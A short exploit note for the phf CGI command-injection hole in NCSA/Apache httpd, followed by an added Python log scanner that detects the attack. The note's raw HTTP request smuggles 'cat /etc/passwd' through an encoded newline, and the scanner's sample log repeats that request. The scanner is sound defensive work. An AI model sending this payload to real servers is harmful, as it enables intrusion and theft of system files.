# telnet to host port 80 and paste the following.
# to patch this simply zero out the perms for phf or, better yet, rm it.
# any cgi script using escape_shell_cmd is exploitable as well.
# this works on ncsa/apache versions of httpd.
# r00t owns you. Now more than ever.

GET /cgi-bin/phf?Jserver=foobar.com%0Acat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0
Accept: */*
Accept: application/x-wais-source
Accept: text/plain
Accept: text/html
Accept: www/mime
User-Agent: Lynx/2.3 BETA libwww/2.14
Referer: http://localhost/cgi-bin/phf
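
# added example, not part of the original note: a log check for the request above,
# flagging /cgi-bin/ requests whose decoded parameters carry a line break (%0A/%0D).
# assumes Common Log Format; the sample lines and all function names are constructed here.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Common Log Format: host ident user [time] "METHOD target PROTO" status bytes
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Characters a CGI parameter should never hand to a shell (line breaks checked separately).
SHELL_META = set(";&|`$<>(){}[]*?~^\\'\"")

def inspect_target(target):
    """Return (param, reason) findings for one request target (hypothetical helper)."""
    parts = urlsplit(target)
    if "/cgi-bin/" not in parts.path:
        return []
    findings = []
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # decode %0A, %20, '+' before looking
        if "\n" in value or "\r" in value:
            findings.append((name, "encoded line break"))
        elif any(c in SHELL_META for c in value):
            findings.append((name, "shell metacharacter"))
    return findings

def scan(lines):
    """Return (client ip, script path, param, reason) for every suspicious request."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        path = urlsplit(m["target"]).path
        for name, reason in inspect_target(m["target"]):
            hits.append((m["ip"], path, name, reason))
    return hits

# Constructed sample log: two benign requests and the request from this note.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/1996:00:00:01 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.10 - - [01/Jan/1996:00:00:02 +0000] "GET /cgi-bin/phf?Qname=foo&Qemail= HTTP/1.0" 200 512',
    '192.0.2.77 - - [01/Jan/1996:00:00:03 +0000] "GET /cgi-bin/phf?Jserver=foobar.com%0Acat%20/etc/passwd%0A&Qalias=&Qname=foo HTTP/1.0" 200 2201',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```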